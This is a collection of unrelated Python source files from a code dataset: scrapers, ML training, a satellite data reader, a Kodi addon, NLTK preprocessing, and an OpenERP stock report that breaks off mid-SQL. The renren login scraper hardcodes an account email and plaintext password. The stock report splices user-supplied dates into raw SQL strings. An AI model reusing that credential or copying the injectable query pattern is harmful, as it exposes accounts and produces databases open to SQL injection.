\n # \n # This function should return a pair ('Article Headline', 'para 1 para 2')\n \nsomeUrl = \"https://www.washingtonpost.com/news/worldviews/wp/2016/11/08/in-rare-blast-at-british-media-prince-harry-says-his-american-girlfriend-meghan-markle-faces-wave-of-abuse/?hpid=hp_hp-more-top-stories_wv-harry-850am%3Ahomepage%2Fstory\"\ntextOfUrl = getOnlyTextWP(someUrl)\nprint(textOfUrl)","sub_path":"2.7/natural_language_004.py","file_name":"natural_language_004.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"252769101","text":"import argparse\r\nfrom glob import glob\r\n\r\nimport tensorflow as tf\r\nimport math\r\nfrom train_MWCNN import *\r\nfrom utils_py3_tfrecord_2 import *\r\nfrom config import *\r\n\r\n#weigth decay momentum optimizer\r\n#L2 regularization\r\n#tensorboard\r\n\r\n\r\nif __name__ == '__main__':\r\n print(tf.executing_eagerly())\r\n physical_devices = tf.config.experimental.list_physical_devices('GPU') \r\n try: \r\n tf.config.experimental.set_memory_growth(physical_devices[0], True) \r\n assert tf.config.experimental.get_memory_growth(physical_devices[0]) \r\n except: \r\n # Invalid device or cannot modify virtual devices once initialized. \r\n pass\r\n\r\n #read dataset\r\n train_dataset = read_and_decode('./patches/MWCNN_train_data.tfrecords')\r\n val_dataset = read_and_decode('./patches/MWCNN_validation_data.tfrecords')\r\n #build model\r\n model = MWCNN()\r\n #set up optimizer\r\n optimizer = tf.optimizers.Adam(learning_rate=0.01, epsilon=1e-8, name='AdamOptimizer')\r\n\r\n writer = tf.summary.create_file_writer('./logs/'+ datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\r\n ckpt = tf.train.Checkpoint(step=tf.Variable(1), optimizer = optimizer, net = model)\r\n manager = tf.train.CheckpointManager(ckpt, checkpoint_directory, max_to_keep=None)\r\n\r\n #checkpoint restortion\r\n ckpt.restore(manager.latest_checkpoint)\r\n if manager.latest_checkpoint:\r\n print(\"Restored from {}\".format(manager.latest_checkpoint))\r\n start_epoch = ckpt.save_counter.numpy() + 1\r\n else:\r\n print(\"Initializing from scratch.\")\r\n start_epoch = 1\r\n\r\n for epoch in range(start_epoch, epochs+1):\r\n print('Start of epoch %d' % (epoch,))\r\n optimizer.learning_rate = decay_lr[epoch]\r\n train_one_epoch(model, train_dataset, optimizer, writer, ckpt)\r\n evaluate_model(model, val_dataset, writer, epoch)\r\n # save the checkpoint in every epoch\r\n save_path = manager.save()\r\n print(\"Saved checkpoint for epoch {}: {}\".format(int(epoch), save_path))\r\n\r\n print(\"Training saved\")\r\n","sub_path":"MWCNN/main_py3_tfrecord_MWCNN.py","file_name":"main_py3_tfrecord_MWCNN.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"305794224","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport urllib\nimport urllib2\nimport cookielib\n\n\ndef login():\n \"\"\"\n 登录模块,产生可以保存Cookie的opener对象\n \"\"\"\n # 1. 创建保存Cookie的cookiejar对象\n cookie_jar = cookielib.CookieJar()\n # 2. 使用Cookiejar对象,构建hanlder处理器\n cookie_handler = urllib2.HTTPCookieProcessor(cookie_jar)\n # 3. 
再通过handler处理器,构建自定义opener对象\n opener = urllib2.build_opener(cookie_handler)\n\n # 登录post请求的url地址\n login_url = \"http://www.renren.com/PLogin.do\"\n # 构建表单数据\n form_data = {\"email\" : \"mr_mao_hacker@163.com\", \"password\" : \"alarmchime\"}\n # 转换为url编码字符\n data = urllib.urlencode(form_data)\n\n headers = {\"User-Agent\" : \"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\"}\n\n request = urllib2.Request(login_url, data, headers)\n\n # 发送登录的post请求,登录成功则自动保存Cookie\n opener.open(request)\n\n # 1. 返回opener对象,传递给其他函数使用\n #return opener\n # 2. 通过install_opener将自定义opener加载为全局权限,这样在代码的任何地方使用urlopen() 都具有opener的功能\n urllib2.install_opener(opener)\n\n\ndef main():\n \"\"\"\n 通过opener对象处理并传递Cookie,获取需要登录权限的页面数据\n \"\"\"\n # 如果是login()是return的话则接收opener对象\n #opener = login()\n login()\n\n url_list = [\n \"http://www.renren.com/327550029/profile\",\n \"http://www.renren.com/410043129/profile\"\n ]\n\n headers = {\"User-Agent\" : \"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\"}\n for index, url in enumerate(url_list):\n request = urllib2.Request(url, headers = headers)\n # 发送其他页面的get请求(附带了登录状态的Cookie)\n #response = opener.open(request)\n response = urllib2.urlopen(request)\n\n with open(str(index) + \"_renren.html\", \"w\") as f:\n f.write(response.read())\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"day01_03/day03/handler_opener/cookielib_renren_login.py","file_name":"cookielib_renren_login.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"173841110","text":"# add GraphFrames package to spark-submit\nimport os\nos.environ['PYSPARK_SUBMIT_ARGS'] = '--packages graphframes:graphframes:0.7.0-spark2.4-s_2.11'\nimport sys\nfrom functools import reduce\nfrom pyspark.sql.functions import col, lit, when\nimport pyspark\nfrom graphframes.examples import Graphs\nfrom graphframes import GraphFrame\nimport config\n\nsc = pyspark.SparkContext()\nsqlContext = pyspark.SQLContext(sc)\ninputFile = sys.argv[1]\n# g = Graphs(sqlContext).friends() # Get example graph\ndf = sqlContext.read.format(\"csv\").option(\"delimiter\", config.delimiter).load(inputFile)\n# Rename columns to something decent.\ndf = df.withColumnRenamed(\"_c0\", \"src\")\\\n.withColumnRenamed(\"_c1\", \"dst\")\\\n.withColumnRenamed(\"_c2\", \"weight\")\ndf.show(5)\n\naggcodes = df.select(\"src\",\"dst\").rdd.flatMap(lambda x: x).distinct()\nvertices = aggcodes.map(lambda x: (x, x)).toDF([\"id\",\"name\"])\n\nedges = df.select(\"src\", \"dst\")\ng = GraphFrame(vertices, edges)\n\n# Display the vertex and edge DataFrames\ng.vertices.show(5)\n# +--+-------+---+\n# |id| name|age|\n# +--+-------+---+\n# | a| Alice| 34|\n# | b| Bob| 36|\n# | c|Charlie| 30|\n# | d| David| 29|\n# | e| Esther| 32|\n# | f| Fanny| 36|\n# | g| Gabby| 60|\n# +--+-------+---+\n\ng.edges.show(5)\n# +---+---+------------+\n# |src|dst|relationship|\n# +---+---+------------+\n# | a| b| friend|\n# | b| c| follow|\n# | c| b| follow|\n# | f| c| follow|\n# | e| f| follow|\n# | e| d| friend|\n# | d| a| friend|\n# | a| e| friend|\n# +---+---+------------+\n\n# Get a DataFrame with columns \"id\" and \"inDegree\" (in-degree)\nvertexInDegrees = g.inDegrees\nvertexInDegrees.show(5)\n\n\n# Run LPA\ncommunities = 
g.labelPropagation(maxIter=5)\ncommunities.persist().show(10)\n","sub_path":"graphframes-examples/label-propagation.py","file_name":"label-propagation.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"372096700","text":"def palin(str1):\n    a=len(str1)//2\n    for i in range(0,a):\n        # compare each character from the front with its mirror from the back\n        if str1[i]!=str1[-1-i]:\n            return(\"Not Palindrome\")\n    return(\"Palindrome\")\n\n#Matrix Multiplication\ndef matrix_mul(m1,m2):\n    m3=[[0,0],\n        [0,0]]\n    for i in range(len(m1)):\n        for j in range(len(m2)):\n            for k in range(len(m3)):\n                m3[i][j]+=m1[i][k]*m2[k][j]\n    return m3\n    \n\n#Matrix Addition\ndef matrix_add(m1,m2):\n    m4=[[0,0],\n        [0,0]]\n    for i in range(len(m1)):\n        for j in range(len(m2)):\n            m4[i][j]=m1[i][j]+m2[i][j]\n    return m4\n\n#display letters after last vowel of the string\ndef stringee(str10):\n    lt=[]\n    for i in range(0,len(str10)):\n        if str10[i] in \"aeiou\":\n            lt.append(i)\n    j=max(lt)+1\n    str12=str10[j:]\n    return(str12)\n","sub_path":"Python/4-4.30/day2defs.py","file_name":"day2defs.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"199326056","text":"# %%\nimport numpy as np\nfrom collections import OrderedDict as odict\nimport struct\nimport os\nimport gzip\nfrom datetime import datetime, timedelta\n\nclass level2(object):\n    \"\"\"\n    Read GSMaP level 2 data\n    \"\"\"\n\n    def __init__(self):\n        self.npix = 221 # fixed. GMI\n\n        dictvars = odict((\n            ('pad1', '4x'),\n            ('lon', 'f'), #\n            ('lat', 'f'), #\n            ('dtime', 'i'), #\n            ('sfctype', 'f'), # sitoil\n            ('irflg', 'f'), #\n            ('sfcprcp', 'f'), # srainfg mm/h\n            ('snowprb', 'f'), # \n            ('pad2', '4x'),\n        ))\n\n\n#        dictvars = odict((\n#            ('pad1', '4x'),\n#            ('lon', 'f'), #\n#            ('lat', 'f'), #\n#            ('dtime', 'i'), #\n#            ('itoil', 'f'), #\n#            ('irflg', 'f'), #\n#            ('rainfg', 'f'), #\n#            ('snowprb', 'f'), #\n#            ('pad2', '4x'),\n#        ))\n\n        self.vars, self.fmts = list(zip(*list(dictvars.items())))\n        self.dictvars = dictvars.copy()\n        self.fmtsize = struct.calcsize( '<'+ ''.join(self.fmts)) # bytes\n\n    def get_var(self, srcPath=None, lvname=[], nrec=None, origin=0, compressed=True):\n        fmts = self.fmts\n        fmtsize = self.fmtsize\n        vars = self.vars\n        npix = self.npix\n\n\n        if compressed is True:\n            with gzip.open(srcPath, 'rb') as f:\n                shead = f.read(12)\n                ncount = struct.unpack_from('')\ndef playvideo(vid):\n    v_url = video_from_vid(vid)\n    url = 'stack://' + ' , '.join(v_url)\n    plugin.set_resolved_url(url)\n\n\n@plugin.route('/setfilters')\ndef setfilters():\n#    a=ML\n    AREA_LIST = {'全部': '0', '内地':'ML', '港台':'HT', '欧美':'US',\n                 '韩国': 'KR', '日本':'JP', '二次元':'ACG','其他': 'Other'}\n#    p=Boy\n    PERSONS = {'全部': '0', '男艺人': 'Boy', '女艺人': 'Girl',\n               '乐队组合': 'Combo', '其他': 'Other'}\n\n#    c=hd, shd..., picture quality\n    dialog = xbmcgui.Dialog()\n\n    title = u'艺人地区'\n    keyword = AREA_LIST.keys()\n    sel = dialog.select(title, keyword)\n    area = '0' if sel < 0 else AREA_LIST[keyword[sel]]\n\n    title = u'艺人类别'\n    keyword = PERSONS.keys()\n    sel = dialog.select(title, keyword)\n    person = '0' if sel < 0 else PERSONS[keyword[sel]]\n    return videolist(sid=0, tid=0, page=1, area=area, person=person)\n\n\n@plugin.route('/videolist/<sid>/<tid>/<page>/<area>/<person>')\ndef videolist(sid, tid, page, area, person):\n    plugin.set_content('videos')\n    res = int(__addon__.getSetting('video_resolution'))\n    reslist = ('hd', 'shd', 'sh')\n\n    page = int(page)\n    req = {\n        'sid': sid,\n        'tid': tid,\n        'a': '' if area == '0' else area,\n        'p': '' if 
person == '0' else person,\n 'c': reslist[res],\n 's': '',\n 'pageSize': 20,\n 'page': page\n }\n \n data = urlencode(req)\n mvapi = 'http://mvapi.yinyuetai.com/mvchannel/so?'\n html = get_html(mvapi + data)\n results = loads(html)\n totalpage = int(results['pageInfo']['pageCount'])\n results = results['result']\n\n items = []\n if page > 1:\n items.append({\n 'label': u'上一页 ({}/{})'.format(page-1, totalpage),\n 'path': url_for('videolist',\n sid=sid,\n tid=tid,\n page=page-1,\n area=area,\n person=person)\n })\n\n for item in results:\n d = item.get('duration', '0:0:0')\n duration = 0\n for t in d.split(':'):\n duration = duration*60 + int(t)\n\n items.append({\n 'label': item['title'],\n 'path': url_for('playvideo', vid=item['videoId']),\n 'thumbnail': item['image'],\n 'is_playable': True,\n 'info': {'title': item['title'],\n 'plot': item['description'],\n 'duration': duration}\n })\n if page < totalpage:\n items.append({\n 'label': u'下一页 ({}/{})'.format(page+1, totalpage),\n 'path': url_for('videolist',\n sid=sid,\n tid=tid,\n page=page+1,\n area=area,\n person=person)\n })\n\n return items\n\n\n@plugin.route('/mainlist/////')\ndef mainlist(sid, tid, page, area, person):\n catapi = 'http://mvapi.yinyuetai.com/cata/get-cata?cataId=%s'\n items = [{\n 'label': u'[选择地区/类别]',\n 'path': url_for('setfilters')\n }]\n\n html = get_html(catapi % sid)\n catas = loads(html)['catas']\n catas.insert(0, {'cataName': u'全部', 'cataId': -1})\n for item in catas:\n tid = item['cataId']\n tid = tid if int(tid) > 0 else 0\n items.append({\n 'label': item['cataName'],\n 'path': url_for('videolist', sid=sid, tid=tid, page=page, area=area, person=person)\n })\n return items\n\n\n@plugin.route('/')\ndef root():\n items = [\n ('全部', '0'),\n ('音乐视频', '3'),\n ('现场/live','4'),\n ('娱乐视频', '9'),\n ('舞蹈', '5'),\n ('演奏', '6'),\n ('ACG', '7'),\n ('戏剧', '8')]\n\n for (name, sid) in items:\n path = 'videolist' if sid == '0' else 'mainlist'\n yield {\n 'label': name,\n 'path': url_for(path,\n sid=sid,\n tid='0',\n page=1,\n area='0',\n person='0')\n }\n\n\nif __name__ == '__main__':\n plugin.run()\n","sub_path":"plugin.video.yinyuetai/addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"309934780","text":"import json\n# Correct some text errors\nimport re\n#Replacing Words (Ex can't => cannot)\nfrom replacers import RegexpReplacer\n#Filter stopwords and punctuation\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\n# Training the POS \nfrom nltk.tag import UnigramTagger\nfrom nltk.corpus import treebank\n# Run Lemmatisation\nfrom nltk.stem import WordNetLemmatizer\n\n\ndef checkTopics(doc):\n topics = ['earn','acquisitions','money-fx','grain','crude','trade','interest','ship','wheat','corn']\n for x in doc['topics']:\n if x in topics:\n return True\n return False\ndef GetTopics(doc):\n topics = ['earn','acquisitions','money-fx','grain','crude','trade','interest','ship','wheat','corn']\n for x in doc['topics']:\n if x in topics:\n return x\ndef LoadJson(path):\n tmp_str =\"\"\n with open(path,'r') as f:\n tmp_str = f.read()\n tmp_json = json.loads(tmp_str)\n return tmp_json\ndef LoadProcess(path):\n j_temp = LoadJson(path)\n j_temp = [x for x in j_temp if checkTopics(x)]\n tmp_bodies = [x['body'].replace('\\n','').replace('Reuter','') for x in j_temp]\n Y = [GetTopics(x) for x in j_temp]\n return ProcessData(tmp_bodies), Y\ndef ProcessData(bodies,strFormat = True):\n replacer 
= RegexpReplacer()\n r = re.compile(r\"^\\w+\\.$\")\n train_sents = treebank.tagged_sents()\n # Training the POS\n tagger = UnigramTagger(train_sents)\n lemmatizer = WordNetLemmatizer()\n bodies_words = []\n for i,body in enumerate(bodies):\n #print 'Body # {}'.format(i)\n #Replacing words (can't etc..)\n tmp_bodies = replacer.replace(body)\n #Filtering stopwords and punctuation\n english_stops = set(stopwords.words('english'))\n toRemove = [',',';','.','the']\n words = [x for x in word_tokenize(tmp_bodies) if ((x not in english_stops) & (x.encode('utf-8').lower() not in toRemove))]\n #Basic text correction\n words = [x.replace('.','') if(re.match(r,x) is not None) else x for x in words]\n # Running the POS\n words_POS = [ x for x in tagger.tag(words) if ((x[1] is not None) & (x[1] is not 'CC'))]#CC => &\n words_POS = [ ('CD',x[1]) if x[1] == 'CD' else x for x in words_POS]\n #Lem of the verbs\n words_POS_LEM = [(lemmatizer.lemmatize(x[0], pos='v'),x[1]) if ('VB' in x[1]) else x for x in words_POS ]\n bodies_words.append([x[0] for x in words_POS_LEM ])\n\n if strFormat is True:\n return [' '.join(x) for x in bodies_words]\n else:\n return bodies_words\n\n\n\n\n\n\n\n\n\n\n","sub_path":"DataMiningExo_Python/Preprocess.py","file_name":"Preprocess.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"467466769","text":"from mx import DateTime\nfrom report import report_sxw\nfrom osv import osv\nimport pooler\nimport time\nfrom tools.translate import _\n\n\nclass report_stock_management(report_sxw.rml_parse):\n \n def set_context(self, objects, data, ids, report_type=None):\n new_ids = ids\n obj_move = self.pool.get('account.move.line')\n obj_period = self.pool.get('account.period')\n period_ids = obj_period.search(self.cr, self.uid, [('date_start','<=',data['form']['date']),('date_stop','>=',data['form']['date'])])\n #print \"period_ids===\",period_ids\n fiscalyear = False\n if period_ids:\n period_id = obj_period.browse(self.cr, self.uid, period_ids[0])\n fiscalyear = period_id.fiscalyear_id and period_id.fiscalyear_id.id or False\n #self.sortby = data['form'].get('sortby', 'sort_date')\n self.query = obj_move._query_get(self.cr, self.uid, obj='l', context=data['form'].get('used_context',{}))\n self.query_in_out = obj_move._query_get(self.cr, self.uid, obj='ll', context=data['form'].get('used_context',{}))\n #print \"data['form'].get('used_context',{})\",data,data['form'].get('used_context',{})\n ctx2 = data['form'].get('used_context',{}).copy()\n ctx2.update({'initial_bal': True, 'fiscalyear': fiscalyear})\n #print \"ctx2\",ctx2\n self.init_query = obj_move._query_get(self.cr, self.uid, obj='l', context=ctx2)\n self.init_in_query = obj_move._query_get(self.cr, self.uid, obj='ll', context=ctx2)\n #print \"=+++++++++\",self.query\n #print \">>>>>>>>>>\",self.init_query\n return super(report_stock_management, self).set_context(objects, data, new_ids, report_type=report_type)\n \n def __init__(self, cr, uid, name, context):\n \n super(report_stock_management, self).__init__(cr, uid, name, context=context)\n self.localcontext.update({\n 'get_product':self._get_product,\n 'get_stock':self._get_stock,\n })\n obj_move = self.pool.get('account.move.line')\n #self.init_query = 'obj_move._query_get(self.cr, self.uid, obj='l', context=ctx2)'\n self.query = \"\"\n self.init_balance = True\n self.context = context\n self.qcache = {}\n self.ilcache = {} # init line cache\n \n \n def _get_product(self, data):\n 
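# Return the ids of product.product records that match the search domain passed in data.\n        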
#print \"data\",data\n product = self.pool.get('product.product').search(self.cr, self.uid, data)\n return product\n \n def _get_stock(self, data, product):\n #print \"product\",product\n query=\"SELECT al.product_id as product_id, al.product_uom as product_uom, COALESCE(al.awal_out_qty,0) as product_qty_out_awal, COALESCE(al.awal_in_qty,0) as product_qty_in_awal, COALESCE(al.out_qty,0) as product_qty_out, COALESCE(al.in_qty,0) as product_qty_in \\\n FROM (select A.product_id as product_id, A.product_uom as product_uom, \\\n (select sum(a.product_qty) \\\n from stock_move a, stock_location b \\\n where a.state IN ('done') and a.product_id = \"+ str(product) +\" \\\n and a.location_id=b.id \\\n and a.date < '\"+ data['date'] +\"' \\\n and b.usage = 'internal') as awal_out_qty, \\\n (select sum(a.product_qty) \\\n from stock_move a, stock_location b \\\n where a.state IN ('done') and a.product_id = \"+ str(product) +\" \\\n and a.location_dest_id=b.id \\\n and a.date < '\"+ data['date'] +\"' \\\n and b.usage = 'internal') as awal_in_qty, \\\n (select sum(a.product_qty) \\\n from stock_move a, stock_location b \\\n where a.state IN ('done') and a.product_id = \"+ str(product) +\" \\\n and a.location_id=b.id \\\n and a.date between '\"+ data['date'] +\"' and '\"+ data['date_end'] +\"' \\\n and b.usage = 'internal') as out_qty, \\\n (select sum(a.product_qty) \\\n from stock_move a, stock_location b \\\n where a.state IN ('done') and a.product_id = \"+ str(product) +\" \\\n and a.location_dest_id=b.id \\\n and a.date between '\"+ data['date'] +\"' and '\"+ data['date_end'] +\"' \\\n and b.usage = 'internal') as in_qty \\\n from stock_move A, stock_location B \\\n where A.state IN ('done') and A.product_id = \"+ str(product) +\" \\\n and B.usage = 'internal' \\\n group by a.product_id, a.product_uom) AS al \\\n group by al.product_id,al.product_uom, al.awal_out_qty, al.awal_in_qty, al.out_qty, al.in_qty\"\n self.cr.execute(query)\n res_lines = self.cr.dictfetchall() \n res = res_lines\n for l in res:\n product = self.pool.get('product.product').browse(self.cr, self.uid, l['product_id'])\n l['product_id'] = product or ''\n l['product_uom'] = product.uom_id or ''\n l['product_awal'] = (l['product_qty_in_awal']) or 0 - (l['product_qty_out_awal']) or 0 or 0\n l['product_qty_out'] = l['product_qty_out'] or 0\n l['product_qty_in'] = l['product_qty_in'] or 0\n l['product_akhir'] = l['product_awal'] - l['product_qty_out'] + l['product_qty_in'] or 0\n return res\n \n def get_children_accounts(self, data, product, account):\n #print \"get_children_accounts\",data\n account = account[0]\n product_obj = self.pool.get('product.product')\n product_id = product_obj.browse(self.cr, self.uid, product)\n# ids_acc = self.pool.get('account.account')._get_children_and_consol(self.cr, self.uid, account)\n# tuple_ids_acc = tuple(ids_acc)\n# for child_account in ids_acc:\n# self.qcache.setdefault(child_account, {'num_entry': 0,\n# 'debit': 0.0, 'credit': 0.0, 'balance': 0.0, 'currency': 0.0, 'num_entry': 0,\n# 'init_debit': 0.0, 'init_credit': 0.0, 'init_balance': 0.0, 'init_currency': 0.0 })\n# q = \"\"\"\n# SELECT l.account_id,\n# count(l.id) AS num_entry,\n# COALESCE(SUM(l.debit),0.0) AS debit,\n# COALESCE(SUM(l.credit),0.0) AS credit,\n# COALESCE(SUM(l.debit),0.0) - COALESCE(SUM(l.credit),0.0) AS balance,\n# COALESCE(SUM(l.amount_currency),0.0) AS currency\n# FROM account_move_line AS l\n# WHERE %s AND\n# l.account_id IN %%s\n# GROUP BY l.account_id\n# \"\"\" % (self.query)\n# self.cr.execute(q, 
(tuple_ids_acc,))\n# for a in self.cr.dictfetchall():\n# aid = a.pop('account_id')\n# self.qcache[aid].update(a)\n\n if self.init_balance:\n move_state = ['posted','']\n #print \"xxxxxxxxxxxxxxxxxxxx\",self.query,account\n #print \"xxxxxxxxxxxxxxxxxxxx\",self.init_in_query,account\n # Compute account initial debit / credit / balance\n q = \"\"\"\n SELECT 0 AS lid, '' AS ldate, '' AS lcode, COALESCE(SUM(l.amount_currency),0.0) AS amount_currency, 'Saldo Awal' AS lref, 'Saldo Awal' AS lname, \n COALESCE(SUM(l.debit),0.0) AS debit, \n COALESCE(SUM(l.credit),0.0) AS credit, \n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.debit >= 0 and ll.credit = 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_in, \n (SELECT COALESCE(sum(ll.debit),0) FROM account_move_line ll WHERE ll.debit >= 0 and ll.credit = 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_debit,\n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.credit >= 0 and ll.debit = 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_out,\n (SELECT COALESCE(sum(ll.credit),0) FROM account_move_line ll WHERE ll.credit >= 0 and ll.debit = 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_credit, \n \n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.debit >= 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_in1, \n (SELECT COALESCE(sum(ll.debit),0) FROM account_move_line ll WHERE ll.debit >= 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_debit1,\n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.credit >= 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_out1,\n (SELECT COALESCE(sum(ll.credit),0) FROM account_move_line ll WHERE ll.credit >= 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_credit1,\n \n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.debit > 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date between '%s' and '%s') AND ll.product_id = %s) AS lqty_in_in, \n (SELECT COALESCE(sum(ll.quantity),0) FROM account_move_line ll WHERE ll.credit > 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date between '%s' and '%s') AND ll.product_id = %s) AS lqty_out_out,\n (SELECT COALESCE(sum(ll.debit),0) FROM account_move_line ll WHERE ll.debit > 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date between '%s' and '%s') 
AND ll.product_id = %s) AS debit_in, \n (SELECT COALESCE(sum(ll.credit),0) FROM account_move_line ll WHERE ll.credit > 0 AND %s AND ll.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND ll.move_id IN (SELECT id FROM account_move WHERE date between '%s' and '%s') AND ll.product_id = %s) AS credit_out, \n '' AS lperiod_id, '' AS lpartner_id,\n '' AS move_name, '' AS mmove_id, '' AS period_code, '' AS aaname, '' AS aname, '' AS acode,\n '' AS currency_code,\n NULL AS currency_id,\n '' AS invoice_id, '' AS invoice_type, '' AS invoice_number,\n '' AS partner_name, '' AS pproduct, '' AS lqty\n FROM account_move_line l\n LEFT JOIN account_move m on (l.move_id=m.id)\n LEFT JOIN product_product prd on (l.product_id=prd.id)\n LEFT JOIN res_currency c on (l.currency_id=c.id)\n LEFT JOIN res_partner p on (l.partner_id=p.id)\n LEFT JOIN account_invoice i on (m.id =i.move_id)\n JOIN account_journal j on (l.journal_id=j.id) AND j.code != 'OBJ' \n WHERE %s AND l.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) AND l.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND l.product_id = %s\n \"\"\" % (self.query_in_out, data['date'], product,\n self.query_in_out, data['date'], product, \n self.query_in_out, data['date'], product, \n self.query_in_out, data['date'], product, \n self.query_in_out, data['date'], product,\n self.query_in_out, data['date'], product, \n self.query_in_out, data['date'], product, \n self.query_in_out, data['date'], product, \n self.init_in_query, data['date'], data['date_end'], product, \n self.init_in_query, data['date'], data['date_end'], product, \n self.init_in_query, data['date'], data['date_end'], product, \n self.init_in_query, data['date'], data['date_end'], product, \n self.init_query, data['date'], product)\n self.cr.execute(q)\n #print q\n res = self.cr.dictfetchall()\n #print \"resss========\",self.init_in_query\n for l in res:\n l['pproduct'] = product_id.name_template\n l['product_awal'] = (l['lqty_debit'] - l['lqty_credit']) > 0.0 and l['lqty_in'] or -l['lqty_out'] or l['lqty_in1']-l['lqty_out1'] #(l['debit'] > 0 and l['lqty_in']) - (l['credit'] > 0 and l['lqty_out'])#l['lqty_in']-l['lqty_out']#\n l['product_masuk'] = ''#l['lqty_in_in'] or 0\n l['product_keluar'] = ''#l['lqty_out_out'] or 0\n l['product_akhir'] = ''#product_id.qty_available or 0.0#l['product_awal'] + l['product_masuk'] - l['product_keluar'] or 0\n l['saldo_awal'] = (l['lqty_debit'] - l['lqty_credit']) or (l['lqty_debit1'] - l['lqty_credit1'])#l['debit'] - l['credit'] or 0\n l['saldo_masuk'] = ''#l['debit_in'] or 0#l['debit']# l['debit_in']\n l['saldo_keluar'] = ''#l['credit_out'] or 0#l['credit']# l['credit_out']\n #print \"=============\",l['debit'],l['lqty_in'],l['credit'],l['lqty_out'],l['product_awal'],l['product_masuk'],l['product_keluar']\n l['saldo_akhir'] = ''#l['saldo_awal'] + l['saldo_masuk'] - l['saldo_keluar']\n return res\n \n def lines(self, data, product, account):\n \"\"\" Return all the account_move_line of account with their account code counterparts \"\"\"\n# if self.qcache[account.id]['num_entry'] == 0:\n# # XXX: No lines, we already known that\n# # XXX: Do we need to diplay the 'Intial Balance' line?\n# return []\n #move_state = ['posted', '']\n # First compute all counterpart strings for every move_id where this account appear.\n # Currently, the counterpart info is used only in landscape mode\n# sql = \"\"\"\n# SELECT m1.move_id,\n# array_to_string(ARRAY(SELECT DISTINCT a.code\n# FROM account_move_line m2\n# LEFT JOIN account_account a ON 
(m2.account_id=a.id)\n# WHERE m2.move_id = m1.move_id\n# AND m2.account_id<>%%s), ', ') AS counterpart\n# FROM (SELECT move_id\n# FROM account_move_line l\n# LEFT JOIN account_move am ON (am.id = l.move_id)\n# WHERE %s AND l.account_id in %%s GROUP BY move_id) m1\n# \"\"\"% (self.query)\n# self.cr.execute(sql, (account, account))\n# counterpart_res = self.cr.dictfetchall()\n# counterpart_accounts = {}\n# for i in counterpart_res:\n# counterpart_accounts[i['move_id']] = i['counterpart']\n# del counterpart_res\n\n # Then select all account_move_line of this account\n sql_sort='l.date, l.move_id'\n sql = \"\"\"\n SELECT l.id AS lid,\n l.date AS ldate,\n j.code AS lcode,\n l.currency_id,\n l.amount_currency,\n l.ref AS lref,\n l.name AS lname,\n aa.name AS aaname,\n COALESCE(l.debit,0) AS debit,\n COALESCE(l.credit,0) AS credit,\n COALESCE(l.quantity,0) AS lqty_in,\n COALESCE(l.quantity,0) AS lqty_out,\n l.period_id AS lperiod_id,\n l.partner_id AS lpartner_id,\n m.name AS move_name,\n m.id AS mmove_id,\n per.code as period_code,\n c.symbol AS 